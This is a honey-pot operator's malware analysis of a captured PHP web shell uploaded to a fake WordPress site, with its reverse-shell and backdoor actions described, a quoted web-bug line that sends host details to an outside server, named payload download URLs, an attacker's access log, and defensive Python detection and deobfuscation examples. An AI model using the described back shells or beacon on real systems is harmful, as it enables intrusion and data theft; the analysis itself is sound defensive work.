#Priv8 2011 Attack Shell# - mutated webrootv3

from 2015-05-26

This is a capture from an earlier incarnation of my WordPress honey pot. It arrived 2015-05-26. I was sloppier in 2015 than I am now, so I don't have a lot of relevant information about the IP address, and I didn't keep other captures from that campaign against my honey pot.

The older honey pot allowed WordPress login with any user ID/password combo. It also had a Web Shell by oRb (WSO) honey pot that was not as advanced as my current WSO honey pot. The old WSO honey pot may not have provided enough feedback about uploaded files to fool attackers into trying to access the URLs of files they thought they had uploaded through WSO.

The captured file is a heavily modified version of the webrot.php that my honey pot also captured as part of the kinked theme activex capture.

Origin

IP Address 78.168.18.77

Since I didn't grab information about 78.168.18.77 back in 2015, about the best I can say is that it's a TurkTelekom IP address.

inetnum:        78.168.0.0 - 78.168.255.255
netname:        TurkTelekom
descr:          TT ADSL-TTnet_dynamic_ulus
country:        tr
admin-c:        TTBA1-RIPE
tech-c:         TTBA1-RIPE
status:         ASSIGNED PA
mnt-by:         as9121-mnt
created:        2007-09-10T09:20:39Z
last-modified:  2010-07-26T14:17:53Z

TurkTelekom has had that IPv4 /16 since 2007, last modifying it in 2010. 78.168.18.77 was almost certainly from Turkey in 2015.

p0f 2.x thought that IP address had "Windows Vista SP1, 7 SP1" and the link was "pppoe (DSL)", which jibes with the "descr" of the address range above.

Download

The attackers apparently believed they were uploading a file through an instance of WSO/Web Shell by oRb (its FilesMAn action). They sent an HTTP POST request with the parameter set typical of a WSO upload:

Parameter name   Value
a                FilesMAn
c                /var/www/html/
p1               uploadFile
charset          Windows-1251

Here a names the WSO action (FilesMan, the file manager), c is the server-side directory the file should land in, p1 is the sub-action (uploadFile), and charset is the output encoding that WSO's forms carry along with every request. The file was named izocin.php on the attacking computer.
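A request with that parameter set is easy to recognise mechanically. The following is an added example for this write-up, not code from the honey pot or from WSO itself: it classifies captured POST parameters as WSO traffic and flags uploads. It assumes the parameters were captured as a urlencoded string (a real WSO upload is multipart/form-data, so the file part has to be stripped first), and the sample bodies are constructed from the table above. WSO dispatches with call_user_func("action" . $_POST['a']), and PHP function names are case-insensitive, so "FilesMAn" and "FilesMan" reach the same code; the matcher therefore compares lower-cased names.

```python
"""Recognise WSO (Web Shell by oRb) requests, uploads in particular, from
captured POST parameters.  Added example, not WSO's or the honey pot's code.
"""
from urllib.parse import parse_qs

# Part of WSO's action vocabulary (the names behind its menu bar).
WSO_ACTIONS = {"secinfo", "filesman", "filestools", "console", "sql",
               "php", "network", "bruteforce", "selfremove"}
# Some of the sub-actions FilesMan accepts in p1; uploadFile is the one seen here.
FILESMAN_SUBACTIONS = {"uploadfile", "mkdir", "delete", "paste", "copy", "cut"}


def parse_body(body: str) -> dict:
    """Flatten a urlencoded body to {name: first value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def classify_wso(body: str):
    """Return a verdict dict for a WSO request, or None for anything else."""
    p = parse_body(body)
    action = p.get("a", "").lower()      # PHP function names are case-insensitive
    if action not in WSO_ACTIONS:
        return None
    sub = p.get("p1", "")
    return {
        "action": action,
        "cwd": p.get("c"),               # directory WSO is "in" on the server
        "p1": sub,
        # WSO's forms always send charset; its absence hints at a hand-made
        # request rather than the real WSO front end driving the shell.
        "charset": p.get("charset"),
        "upload": action == "filesman" and sub.lower() == "uploadfile",
        "known_subaction": action != "filesman" or sub.lower() in FILESMAN_SUBACTIONS,
    }


# Constructed samples: the first mirrors the capture above, the second a
# console command, the third an ordinary WordPress login POST.
SAMPLES = [
    "a=FilesMAn&c=%2Fvar%2Fwww%2Fhtml%2F&p1=uploadFile&charset=Windows-1251",
    "a=Console&c=%2Fvar%2Fwww%2Fhtml%2F&p1=uname+-a&charset=UTF-8",
    "log=admin&pwd=11111&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(classify_wso(body))
```

A honey pot that wants to look convincing should answer an upload verdict by pretending the file now exists at cwd plus the client-supplied name, since that is the URL the attacker will try next.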

Deobfuscation

I just pretty-printed it for readability. The original is so poorly-formatted that I can hardly make it out.

Analysis

Priv8 Attack Shell 2011 screen shot

This illustrates that even SuperVillain Middle-East Hackers are very poor user interface designers. These folks made the basic mistake of an app being just a menu bar. Additionally, their sense of style is abominable.

Design

The whole web shell works off the value of an HTTP GET parameter named BackConnect. The code recognizes 30 different values of BackConnect.

Many of the 30 actions start "back shells": the code opens an outgoing TCP connection to some IP address and well-known port, then starts a command interpreter on the compromised WordPress host with that socket as its standard input and output. Because the connection is outbound, NAT on the victim's side is no obstacle, and since egress traffic is rarely filtered or monitored, most firewalls are no obstacle either.

The back shells usually connect to TCP port 22 on the machine the HTTP request came from. TCP port 22 is by convention the port SSH servers listen on, but this code makes no attempt to speak SSH; everything crosses the socket in cleartext. Picking 22 is presumably meant to blend in with outbound SSH, which egress filters commonly permit. The attacker has to run a program that listens on TCP port 22 and relays bytes between the keyboard and the back shell; a netcat listener suffices.

Built-in PHP back shells

Action "PHP_1" starts a back shell that is built into izocin.php. It calls pcntl_fork() to create a new process, and the child does the sensible things any background daemon does: change directory to "/", clear the umask, and start a new session so it is no longer tied to the web server's process group.

The child uses fsockopen() to connect to TCP port 22 on the machine that made the HTTP request. It creates pipes, connects them to a shell process started with proc_open(), and then multiplexes between the socket and the pipes with stream_select().

Action PHP_12 is a built-in backdoor that tries stream_socket_client(), fsockopen() and socket_create() in that order to open the connection, falling back to the next if one fails, presumably because shared hosts often disable some of these functions.

It reads a 4-byte integer from the socket, then reads that many bytes of PHP from the socket and eval()s them. That length-prefixed framing is the mark of a backdoor meant to be driven by another program rather than by a human at a keyboard.
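The PHP_12 exchange, as an added example for this write-up rather than code from the shell: both ends run on the loopback interface, the "handler" side plays the attacker's listener and pushes one length-prefixed frame, and the "victim" side reads it the way PHP_12 would, except that it returns the payload for logging instead of eval'ing it, which is what a honey pot wants in order to capture a second stage without running it. The byte order of the length is an assumption (big-endian, as PHP's unpack("N") would give); the page does not say which the shell uses. The "PHP" payload is a constructed stand-in. A 4-byte length lets the peer claim four gigabytes, so the reader caps it rather than allocating whatever it is told.

```python
"""Loopback emulation of PHP_12's framing: 4-byte length, then that many
bytes of PHP.  Added example, not the web shell's code.
"""
import socket
import struct
import threading

HEADER = struct.Struct(">I")   # assumed: 4-byte big-endian unsigned length
MAX_FRAME = 1 << 20            # refuse absurd lengths instead of allocating them


def frame_length(header: bytes) -> int:
    """Decode the length prefix, rejecting anything beyond MAX_FRAME."""
    (length,) = HEADER.unpack(header)
    if length > MAX_FRAME:
        raise ValueError(f"frame length {length} exceeds {MAX_FRAME}")
    return length


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """recv() may return short reads; loop until n bytes or the peer closes."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed mid-frame")
        buf += chunk
    return bytes(buf)


def send_frame(sock: socket.socket, payload: bytes) -> None:
    sock.sendall(HEADER.pack(len(payload)) + payload)


def recv_frame(sock: socket.socket) -> bytes:
    length = frame_length(recv_exact(sock, HEADER.size))
    return recv_exact(sock, length)


def handler_side(listener: socket.socket, payload: bytes) -> None:
    """Attacker-side listener: accept one back-connect and push one frame."""
    conn, _peer = listener.accept()
    with conn:
        send_frame(conn, payload)


def loopback_exchange(payload: bytes) -> bytes:
    """Run both ends on 127.0.0.1 and return what the victim side received."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))        # any free port stands in for 22
    listener.listen(1)
    port = listener.getsockname()[1]
    worker = threading.Thread(target=handler_side, args=(listener, payload))
    worker.start()
    with socket.create_connection(("127.0.0.1", port)) as victim:
        received = recv_frame(victim)      # honey pot: log it, never eval() it
    worker.join()
    listener.close()
    return received


SECOND_STAGE = b'<?php echo php_uname(); ?>'   # constructed stand-in payload

if __name__ == "__main__":
    print(loopback_exchange(SECOND_STAGE).decode())
```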

PHP_13 is the "PHP Connect-Back SyRiAn Sh3ll". It reads up to 65535 bytes from the socket connected back to the invoking machine, executes them as a shell command string, then writes the output back to the socket.

Code downloaded from elsewhere

Some of the actions download files from other hosts and create .htaccess files that would make an Apache web server run those downloaded files as CGI programs. As of 2019-02-24, almost four years after my honey pot captured this code, none of those files are available, and many of the host names no longer resolve in DNS.
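The .htaccess trick works only where Apache honours per-directory overrides, and a dropped .htaccess is also the easiest artefact to hunt for afterwards. The following is an added example for this write-up, not the shell's code: it walks a document root and reports every .htaccess that enables CGI execution. The shell's own .htaccess contents are not shown on this page, so the directives matched are the ordinary Apache ones that produce that effect (Options with ExecCGI, a cgi-script handler, or the x-httpd-cgi type), and the sample tree is constructed in a temporary directory with one planted file.

```python
"""Hunt for .htaccess files that turn a writable web directory into a CGI
launcher.  Added example, not the shell's or the honey pot's code.
"""
import os
import re
import tempfile

# Directives that let files in this directory execute as CGI programs.
CGI_DIRECTIVES = re.compile(
    r"^[ \t]*(?:Options\b[^\n]*\s\+?ExecCGI\b"
    r"|(?:AddHandler|SetHandler)\s+cgi-script\b"
    r"|AddType\s+application/x-httpd-cgi\b)",
    re.IGNORECASE | re.MULTILINE,
)


def suspicious_htaccess(path: str) -> list:
    """Return the CGI-enabling directives found in one .htaccess file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return [m.group(0).strip() for m in CGI_DIRECTIVES.finditer(text)]


def hunt(docroot: str) -> dict:
    """Map each offending .htaccess (relative to docroot) to its directives."""
    hits = {}
    for dirpath, _dirs, files in os.walk(docroot):
        if ".htaccess" not in files:
            continue
        full = os.path.join(dirpath, ".htaccess")
        found = suspicious_htaccess(full)
        if found:
            hits[os.path.relpath(full, docroot)] = found
    return hits


def build_sample_docroot() -> str:
    """Constructed fixture: a WordPress-like tree with one planted .htaccess."""
    root = tempfile.mkdtemp(prefix="docroot-")
    theme = os.path.join(root, "wp-content", "themes", "320")
    os.makedirs(theme)
    with open(os.path.join(theme, ".htaccess"), "w") as fh:   # the dropped one
        fh.write("Options +ExecCGI\nAddHandler cgi-script .txt .dat\n")
    with open(os.path.join(root, ".htaccess"), "w") as fh:    # normal WP rules
        fh.write("RewriteEngine On\nRewriteRule . /index.php [L]\n")
    return root


if __name__ == "__main__":
    for path, directives in hunt(build_sample_docroot()).items():
        print(path, directives)
```

The preventive counterpart is configuration rather than hunting: Options needs AllowOverride Options and AddHandler/SetHandler need AllowOverride FileInfo, so an AllowOverride None (or at least one without those two) on the wp-content tree makes a dropped .htaccess like the planted one inert.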

Other web shell actions

Two of the web shell actions, PHP_2 and PHP_3, seem to exist just to do very simple "back connect" verification.

The PHP_4 action would have downloaded http://paradiseinpuntagorda.com/images/dc and executed it with the invoking machine's IP address and port 22 as arguments. I assume it was some kind of back shell.

PHP_10 would have downloaded http://dzrecharge.tk/pv8L/1.txt into a file autoroot/autoroot.txt, and marked it executable without ever executing it. Since the code doesn't create an .htaccess file for the autoroot/ directory, it's unlikely anyone could invoke whatever code this was via HTTP.

PHP_14 reads /etc/named.conf, extracts the DNS zone names, and for each zone looks for a file of the same name in /etc/valiases (cPanel's per-domain mail alias files) and reports that file's owner, which maps each hosted domain to the local account that owns it. It prints an HTML table of such matches.

The PHP_24 action seems to eval PHP code, or maybe use the cURL library to show you /etc/passwd. I'm not sure, and the code looks wrong.

I just don't understand the PHP_25 action. It has a variable named $shellcode which contains some random-looking bytes, and possibly a little-endian representation of "/bin/sh". It just doesn't look like the shell code gets executed.

Code kept internally

The bulk of the actions Priv8 Attack Shell performs are implemented by chunks of code kept gzipped and Base64-encoded inside izocin.php. Some of these are written to files and invoked as CGI programs; others are immediately eval'ed by the PHP interpreter.

See the internal_code subdirectory for the dismaying details. Those details indicate that "Priv8 Attack Shell" is just an evolved version of "webroot" or "webrootv3", something that has been around since 2013 or even earlier.
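Getting at those chunks is mechanical once you know the wrapper. The following is an added example for this write-up, not the honey pot's tooling: it peels eval(gzinflate(base64_decode("..."))) style layers off a PHP dropper until plain code remains. The three wrappers handled are the PHP decompressors such droppers pair with base64_decode, namely gzinflate (raw DEFLATE), gzuncompress (zlib framing) and gzdecode (gzip framing); which one this shell uses is not stated on the page, so SAMPLE is constructed here by wrapping a harmless stand-in snippet three layers deep, one layer per wrapper. The nesting limit guards against a blob built to unwrap forever.

```python
"""Peel eval(<decompress>(base64_decode("..."))) layers off a PHP dropper.
Added example, not the honey pot's tooling.
"""
import base64
import gzip
import re
import zlib

WRAPPED = re.compile(
    r"""(gzinflate|gzuncompress|gzdecode)\s*\(\s*base64_decode\s*\(\s*["']([A-Za-z0-9+/=\s]+)["']\s*\)\s*\)"""
)

DECOMPRESS = {
    "gzinflate": lambda b: zlib.decompress(b, -zlib.MAX_WBITS),  # raw DEFLATE
    "gzuncompress": zlib.decompress,                              # zlib stream
    "gzdecode": gzip.decompress,                                  # gzip stream
}


def peel_once(src: str):
    """Decode the first wrapped blob in src: (inner_source, wrapper) or None."""
    m = WRAPPED.search(src)
    if m is None:
        return None
    blob = base64.b64decode(re.sub(r"\s+", "", m.group(2)))
    return DECOMPRESS[m.group(1)](blob).decode("utf-8", "replace"), m.group(1)


def peel_all(src: str, limit: int = 32):
    """Unwrap nested layers until plain code remains: (code, [wrappers])."""
    layers = []
    for _ in range(limit):               # a hostile blob could nest forever
        step = peel_once(src)
        if step is None:
            break
        src, name = step
        layers.append(name)
    return src, layers


# --- constructed sample: wrap a harmless stand-in three layers deep ---------
COMPRESS = {
    "gzinflate": lambda b: zlib.compress(b)[2:-4],   # drop zlib header/adler32
    "gzuncompress": zlib.compress,
    "gzdecode": gzip.compress,
}


def wrap(inner: str, how: str) -> str:
    """Produce the dropper form eval(<how>(base64_decode("..."))) around inner."""
    blob = base64.b64encode(COMPRESS[how](inner.encode())).decode()
    return f'<?php eval({how}(base64_decode("{blob}"))); ?>'


INNER = '<?php $a = $_GET["BackConnect"]; echo "stand-in for the real action"; ?>'
SAMPLE = wrap(wrap(wrap(INNER, "gzinflate"), "gzuncompress"), "gzdecode")

if __name__ == "__main__":
    code, layers = peel_all(SAMPLE)
    print(layers)
    print(code)
```

On a real sample, run peel_all over each chunk the dropper writes out or eval's and diff the results against the webroot sources to see what the "mutation" actually changed.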

priv8.iblogger.org

2019-02-23, iblogger.org is a namecheap.com domain:

priv8.iblogger.org      canonical name = 11776.bodis.com.
Name:   11776.bodis.com
Address: 199.59.242.151

izocin.php tried to retrieve a 0x0 pixel "image" from priv8.iblogger.org, really a web bug that reports the compromised host's php_uname() output (kernel and OS details) to whoever runs that server, with a bit of code like this:

<font face="Wingdings"><img border="0" src="http://priv8.iblogger.org/s.php?'+<?echo "uname -a : "; echo (php_uname())?>";" width="0" height="0"></a></font>

As of 2019-02-23, priv8.iblogger.org will respond to that URL, apparently with minified or obfuscated JavaScript.

Campaign

Below are the only accesses by 78.168.18.77 my web server recorded.

The attacker(s) did try some things interactively with psiqo.php, and the WordPress honey pot. I'm almost certain that the accesses listed below are interactive, a human driving a browser, because of two things.

  1. Access of URLs that no program ever accesses, like /favicon.ico, or /wp-admin/css/colors.min.css.
  2. Automatic access is usually quite rapid. Here, delays of several seconds occur between "major" URLs. Rapid, sub-second access only occurs between major URLs and the URLs noted in (1) above: URLs referenced by the major URLs in src="..." attributes.

Arrival date (zone -06)   IP address     URL accessed
2015-05-26 13:14:32-06 78.168.18.77 /wp-login.php:admin:11111
2015-05-26 13:14:38-06 78.168.18.77 /wp-includes/css/dashicons.min.css?ver=3.8
2015-05-26 13:14:38-06 78.168.18.77 /wp-admin/css/wp-admin.min.css?ver=3.8
2015-05-26 13:14:38-06 78.168.18.77 /favicon.ico
2015-05-26 13:14:38-06 78.168.18.77 /wp-login.php
2015-05-26 13:14:40-06 78.168.18.77 /wp-admin/css/colors.min.css?ver=3.8
2015-05-26 13:14:40-06 78.168.18.77 /wp-includes/css/buttons.min.css?ver=3.8
2015-05-26 13:14:47-06 78.168.18.77 /wp-admin/images/wordpress-logo.svg?ver=20131107
2015-05-26 13:14:48-06 78.168.18.77 /favicon.ico
2015-05-26 13:14:58-06 78.168.18.77 /wp-login.php
2015-05-26 13:14:58-06 78.168.18.77 /wp-admin/
2015-05-26 13:14:59-06 78.168.18.77 /wp-admin/load-scripts.php?c=1&load%5B%5D=jquery-core,jquery-migrate,utils,json2&ver=3.8.1
2015-05-26 13:14:59-06 78.168.18.77 /wp-admin/css/colors/blue/colors.min.css?ver=3.8.1
2015-05-26 13:14:59-06 78.168.18.77 /wp-includes/js/thickbox/thickbox.css?ver=20131201
2015-05-26 13:14:59-06 78.168.18.77 /wp-admin/load-styles.php?c=1&dir=ltr&load=dashicons,admin-bar,wp-admin,buttons,wp-auth-check&ver=3.8.1
2015-05-26 13:15:00-06 78.168.18.77 /wp-admin/load-scripts.php?c=1&load%5B%5D=hoverIntent,common,admin-bar,wp-ajax-response,jquery-color,wp-lists,quicktags,jquery-query,admin-comments,jquery-ui-core,jquery-&load%5B%5D=ui-widget,jquery-ui-mouse,jquery-ui-sortable,postbox,dashboard,customize-base,customize-loader,thickbox,plugin-install,underscor&load%5B%5D=e,shortcode,media-upload,svg-painter,heartbeat,wp-auth-check&ver=3.8.1
2015-05-26 13:15:08-06 78.168.18.77 /wp-admin/themes.php
2015-05-26 13:15:09-06 78.168.18.77 /wp-admin/load-scripts.php?c=1&load%5B%5D=hoverIntent,common,admin-bar,thickbox,underscore,backbone,wp-util,wp-backbone,theme,customize-base,customize-loader,svg-painter,&load%5B%5D=heartbeat,wp-auth-check&ver=3.8.1
2015-05-26 13:15:09-06 78.168.18.77 /wp-admin/load-styles.php?c=1&dir=ltr&load=dashicons,admin-bar,wp-admin,buttons,wp-auth-check&ver=3.8.1
2015-05-26 13:15:09-06 78.168.18.77 /wp-content/themes/twentytwelve/screenshot.png
2015-05-26 13:15:09-06 78.168.18.77 /wp-admin/load-scripts.php?c=1&load%5B%5D=jquery-core,jquery-migrate,utils,json2&ver=3.8.1
2015-05-26 13:15:17-06 78.168.18.77 /wp-content/themes/twentyfourteen/screenshot.png
2015-05-26 13:15:18-06 78.168.18.77 /wp-content/themes/twentythirteen/screenshot.png
2015-05-26 13:15:23-06 78.168.18.77 /wp-admin/theme-install.php
2015-05-26 13:15:24-06 78.168.18.77 /wp-admin/load-styles.php?c=1&dir=ltr&load=dashicons,admin-bar,wp-admin,buttons,wp-auth-check&ver=3.8.1
2015-05-26 13:15:26-06 78.168.18.77 /wp-admin/load-scripts.php?c=1&load%5B%5D=jquery-core,jquery-migrate,utils&ver=3.8.1
2015-05-26 13:15:29-06 78.168.18.77 /wp-admin/load-scripts.php?c=1&load%5B%5D=hoverIntent,common,admin-bar,theme-install,thickbox,theme-preview,svg-painter,heartbeat,wp-auth-check&ver=3.8.1
2015-05-26 13:15:33-06 78.168.18.77 /
2015-05-26 13:15:34-06 78.168.18.77 /vim.powered.by.vim.gif
2015-05-26 13:15:38-06 78.168.18.77 /wp-admin/theme-install.php?tab=upload
2015-05-26 13:15:39-06 78.168.18.77 /wp-admin/load-scripts.php?c=1&load%5B%5D=jquery-core,jquery-migrate,utils&ver=3.8.1
2015-05-26 13:15:39-06 78.168.18.77 /wp-admin/load-styles.php?c=1&dir=ltr&load=dashicons,admin-bar,wp-admin,buttons,wp-auth-check&ver=3.8.1
2015-05-26 13:15:39-06 78.168.18.77 /wp-admin/load-scripts.php?c=1&load%5B%5D=hoverIntent,common,admin-bar,theme-install,thickbox,theme-preview,svg-painter,heartbeat,wp-auth-check&ver=3.8.1
2015-05-26 13:16:34-06 78.168.18.77 /wp-admin/update.php?action=upload-theme
2015-05-26 13:18:12-06 78.168.18.77 /wp-admin/load-scripts.php?c=1&load%5B%5D=jquery-core,jquery-migrate,utils,json2&ver=3.8.1
2015-05-26 13:18:12-06 78.168.18.77 /wp-admin/load-scripts.php?c=1&load%5B%5D=hoverIntent,common,admin-bar,customize-base,customize-loader,svg-painter&ver=3.8.1
2015-05-26 13:18:12-06 78.168.18.77 /wp-admin/load-styles.php?c=1&dir=ltr&load=dashicons,admin-bar,wp-admin,buttons&ver=3.8.1
2015-05-26 13:18:43-06 78.168.18.77 /wp-content/themes/320
2015-05-26 13:18:55-06 78.168.18.77 /wp-admin/customize.php?theme=houston
2015-05-26 13:18:55-06 78.168.18.77 /wp-admin/load-scripts.php?c=1&load%5B%5D=customize-base,customize-controls,accordion,underscore,backbone,wp-util,wp-backbone,media-models,wp-plupload,jquery-ui-core,jque&load%5B%5D=ry-ui-widget,jquery-ui-mouse,jquery-ui-draggable,jquery-ui-slider,jquery-touch-punch,iris,wp-color-picker&ver=3.8.1
2015-05-26 13:18:55-06 78.168.18.77 /wp-admin/load-scripts.php?c=1&load%5B%5D=jquery-core,jquery-migrate,json2,plupload,plupload-html5,plupload-flash,plupload-silverlight,plupload-html4&ver=3.8.1
2015-05-26 13:18:55-06 78.168.18.77 /wp-admin/load-styles.php?c=1&dir=ltr&load=dashicons,wp-admin,buttons,customize-controls,wp-color-picker&ver=3.8.1
2015-05-26 13:19:00-06 78.168.18.77 /wp-admin/images/spinner.gif
2015-05-26 13:19:03-06 78.168.18.77 /wp-admin/themes.php?action=activate&template=p2&stylesheet=houston&_wpnonce=bc4c2029ae
2015-05-26 13:19:04-06 78.168.18.77 /wp-content/themes/twentyfourteen/screenshot.png
2015-05-26 13:19:04-06 78.168.18.77 /wp-admin/load-styles.php?c=1&dir=ltr&load=dashicons,admin-bar,wp-admin,buttons,wp-auth-check&ver=3.8.1
2015-05-26 13:19:04-06 78.168.18.77 /wp-admin/load-scripts.php?c=1&load%5B%5D=jquery-core,jquery-migrate,utils,json2&ver=3.8.1
2015-05-26 13:19:04-06 78.168.18.77 /wp-admin/load-scripts.php?c=1&load%5B%5D=hoverIntent,common,admin-bar,thickbox,underscore,backbone,wp-util,wp-backbone,theme,customize-base,customize-loader,svg-painter,&load%5B%5D=heartbeat,wp-auth-check&ver=3.8.1
2015-05-26 13:19:05-06 78.168.18.77 /wp-content/themes/twentyfourteen/screenshot.png
2015-05-26 13:19:11-06 78.168.18.77 /wp-content/themes/320
2015-05-26 13:19:21-06 78.168.18.77 /wp-content/themes/320/psiqo.php
2015-05-26 13:19:38-06 78.168.18.77 /wp-content/themes/320/psiqo.php
2015-05-26 13:20:06-06 78.168.18.77 /wp-content/themes/320/psiqo.php
2015-05-26 13:20:18-06 78.168.18.77 /wp-content/themes/320/psiqo.php
2015-05-26 13:20:40-06 78.168.18.77 /wp-content/themes/320/psiqo.php
2015-05-26 13:22:22-06 78.168.18.77 /wp-content/themes/320/psiqo.php
2015-05-26 13:22:32-06 78.168.18.77 /wp-content/themes/320/psiqo.php
2015-05-26 13:22:39-06 78.168.18.77 /wp-admin/theme-editor.php
2015-05-26 13:22:39-06 78.168.18.77 /wp-admin/load-styles.php?c=1&dir=ltr&load=dashicons,admin-bar,wp-admin,buttons,wp-auth-check&ver=3.8.1
2015-05-26 13:22:40-06 78.168.18.77 /wp-admin/load-scripts.php?c=1&load%5B%5D=jquery-core,jquery-migrate,utils&ver=3.8.1
2015-05-26 13:22:41-06 78.168.18.77 /wp-admin/load-scripts.php?c=1&load%5B%5D=hoverIntent,common,admin-bar,svg-painter,heartbeat,wp-auth-check&ver=3.8.1
2015-05-26 13:23:17-06 78.168.18.77 /wp-admin/theme-editor.php?file=404.php&theme=twentytwelve
2015-05-26 13:23:47-06 78.168.18.77 /wp-admin/theme-editor.php
2015-05-26 13:24:06-06 78.168.18.77 /wp-content/themes/twentytwelve/404.php
2015-05-26 13:25:07-06 78.168.18.77 /wp-content/themes/320/psiqo.php
2015-05-26 13:25:17-06 78.168.18.77 /wp-content/themes/320/psiqo.php
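The two tells above can be turned into a rule that runs over the honey pot's log. The following is an added example for this write-up, not the honey pot's own tooling: it reads the log layout shown in the table (date, clock time with a "-06" zone suffix, IP address, URL), scores a session on asset fetches and on the gaps between major URLs, and lists the URLs that point at an uploaded shell or drive one. HUMAN_SESSION is a subset of the real table above plus one constructed line carrying a BackConnect parameter; SCRIPTED_SESSION is entirely constructed, to exercise the other branch.

```python
"""Classify a honey pot session as human-driven or scripted, and list the
web-shell indicators in it.  Added example, not the honey pot's own tooling.
"""
import re
from collections import namedtuple
from datetime import datetime

Hit = namedtuple("Hit", "ts ip url")

# Things a browser fetches because a page referenced them; scripts rarely do.
ASSET = re.compile(r"\.(css|js|png|gif|svg|ico)(\?|$)|/load-(scripts|styles)\.php")
# A PHP file requested directly inside a theme directory (themes are loaded
# through index.php, not requested by URL), or this family's dispatch parameter.
SHELL = re.compile(r"/wp-content/themes/[^/]+/[^/?]+\.php|[?&]BackConnect=", re.I)


def parse_line(line: str) -> Hit:
    date, clock, ip, url = line.split(maxsplit=3)
    # Every line carries the same "-06" suffix, so naive local times suffice.
    ts = datetime.strptime(f"{date} {clock[:8]}", "%Y-%m-%d %H:%M:%S")
    return Hit(ts, ip, url)


def classify_session(hits) -> dict:
    """Return "human" or "scripted" plus the measurements behind the call."""
    hits = sorted(hits, key=lambda h: h.ts)
    majors = [h for h in hits if not ASSET.search(h.url)]
    assets = [h for h in hits if ASSET.search(h.url)]
    gaps = [(b.ts - a.ts).total_seconds() for a, b in zip(majors, majors[1:])]
    # Log resolution is one second, so "sub-second" means the same timestamp.
    fast = sum(1 for g in gaps if g < 1)
    slow = sum(1 for g in gaps if g >= 3)
    # An asset fetched within a second of some major URL was page-driven.
    driven = sum(1 for a in assets
                 if any(abs((a.ts - m.ts).total_seconds()) <= 1 for m in majors))
    human = (bool(assets) and driven * 2 >= len(assets)
             and slow >= 1 and fast * 2 < max(len(gaps), 1))
    return {"verdict": "human" if human else "scripted",
            "majors": len(majors), "assets": len(assets), "page_driven": driven,
            "fast_gaps": fast, "slow_gaps": slow}


def shell_indicators(hits) -> list:
    """URLs in the session that point at an uploaded shell or drive one."""
    return sorted({h.url for h in hits if SHELL.search(h.url)})


HUMAN_SESSION = [   # subset of the real table above; last line constructed
    "2015-05-26 13:14:32-06 78.168.18.77 /wp-login.php:admin:11111",
    "2015-05-26 13:14:38-06 78.168.18.77 /wp-includes/css/dashicons.min.css?ver=3.8",
    "2015-05-26 13:14:38-06 78.168.18.77 /favicon.ico",
    "2015-05-26 13:14:38-06 78.168.18.77 /wp-login.php",
    "2015-05-26 13:14:58-06 78.168.18.77 /wp-login.php",
    "2015-05-26 13:14:58-06 78.168.18.77 /wp-admin/",
    "2015-05-26 13:14:59-06 78.168.18.77 /wp-admin/load-styles.php?c=1&dir=ltr&load=dashicons,admin-bar,wp-admin,buttons,wp-auth-check&ver=3.8.1",
    "2015-05-26 13:15:08-06 78.168.18.77 /wp-admin/themes.php",
    "2015-05-26 13:15:09-06 78.168.18.77 /wp-content/themes/twentytwelve/screenshot.png",
    "2015-05-26 13:19:21-06 78.168.18.77 /wp-content/themes/320/psiqo.php",
    "2015-05-26 13:20:06-06 78.168.18.77 /wp-content/themes/320/psiqo.php?BackConnect=PHP_1",
]

SCRIPTED_SESSION = [   # constructed: a password-guessing loop, no assets
    "2015-05-26 02:00:00-06 203.0.113.9 /wp-login.php:admin:123456",
    "2015-05-26 02:00:00-06 203.0.113.9 /wp-login.php:admin:password",
    "2015-05-26 02:00:00-06 203.0.113.9 /wp-login.php:admin:admin",
    "2015-05-26 02:00:01-06 203.0.113.9 /wp-login.php:admin:letmein",
]

if __name__ == "__main__":
    for name, lines in (("human", HUMAN_SESSION), ("scripted", SCRIPTED_SESSION)):
        hits = [parse_line(l) for l in lines]
        print(name, classify_session(hits), shell_indicators(hits))
```

The thresholds (three seconds for a "slow" gap, half the assets page-driven) are tuned to this one session and should be checked against more captures before being trusted; the shell-indicator regex also flags direct requests to legitimate theme files such as 404.php, which is worth seeing since the attacker here edited exactly that file through the theme editor.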